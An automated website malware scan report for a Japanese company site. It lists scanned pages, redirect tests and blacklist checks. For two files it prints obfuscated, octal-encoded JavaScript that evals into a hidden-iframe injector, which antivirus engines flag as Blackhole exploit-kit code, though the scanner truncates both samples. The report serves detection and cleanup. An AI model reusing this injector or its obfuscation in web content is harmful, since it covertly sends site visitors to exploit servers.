New scan:

Malware Scanner report for if-ss.co.jp

Malicious/Suspicious/Total urls checked
2/0/11
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://if-ss.co.jp/
200 OK
Content-Length: 8067
Content-Type: text/html
clean
http://if-ss.co.jp/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 13423
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,167,163,156,157,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,167,163,156,157,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,162,163,171,166,166,155,170,171,166,151,61,167,145,162,170,151,62,147,163,161,63,147,163,171,162,170,62,164,154,164,53,77
... 4122 bytes are skipped ...
67,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));

Antivirus reports:

AntiVir
JS/EXP.Redir.EL.7
Ikarus
Virus.JS.Obfuscated
CAT-QuickHeal
JS/Coolex.D
McAfee-GW-Edition
JS/Exploit-Blacole.ht
McAfee
JS/Exploit-Blacole.ht

http://if-ss.co.jp/company.html
200 OK
Content-Length: 18436
Content-Type: text/html
clean
http://if-ss.co.jp/index.html
200 OK
Content-Length: 8067
Content-Type: text/html
clean
http://if-ss.co.jp/new_staff.html
200 OK
Content-Length: 8644
Content-Type: text/html
clean
http://if-ss.co.jp/cgi-bin/scheduler/scheduler.cgi
401 Authorization Required
Content-Length: 397
Content-Type: text/html
clean
http://if-ss.co.jp/test404page.js
404 Not Found
Content-Length: 323
Content-Type: text/html
clean
http://if-ss.co.jp/link.html
200 OK
Content-Length: 4672
Content-Type: text/html
clean
http://if-ss.co.jp/p-policy.html
200 OK
Content-Length: 8280
Content-Type: text/html
clean
http://if-ss.co.jp/i/index.html
200 OK
Content-Length: 6771
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,164,176,165,167,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,164,176,165,167,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,162,163,171,166,166,155,170,171,166,151,61,167,145,162,170,151,62,147,163,161,63,147,163,171,162,170,62,164,154,164,53,77
... 4122 bytes are skipped ...
67,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));

Antivirus reports:

AntiVir
JS/EXP.Redir.EL.7
Ikarus
Virus.JS.Obfuscated
CAT-QuickHeal
JS/Coolex.D
McAfee-GW-Edition
JS/Exploit-Blacole.ht
McAfee
JS/Exploit-Blacole.ht

http://if-ss.co.jp/i/tel:0270-26-9645
404 Not Found
Content-Length: 327
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: if-ss.co.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Apr 2014 21:38:40 GMT
Accept-Ranges: bytes
ETag: "3121b6-1f83-52b25cae"
Server: A p a c h e
Content-Length: 8067
Content-Type: text/html
Last-Modified: Thu, 19 Dec 2013 02:40:46 GMT

...8067 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: if-ss.co.jp
Referer: http://www.google.com/search?q=if-ss.co.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=if-ss.co.jp

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://if-ss.co.jp/

Result: if-ss.co.jp is not infected or malware details are not published yet.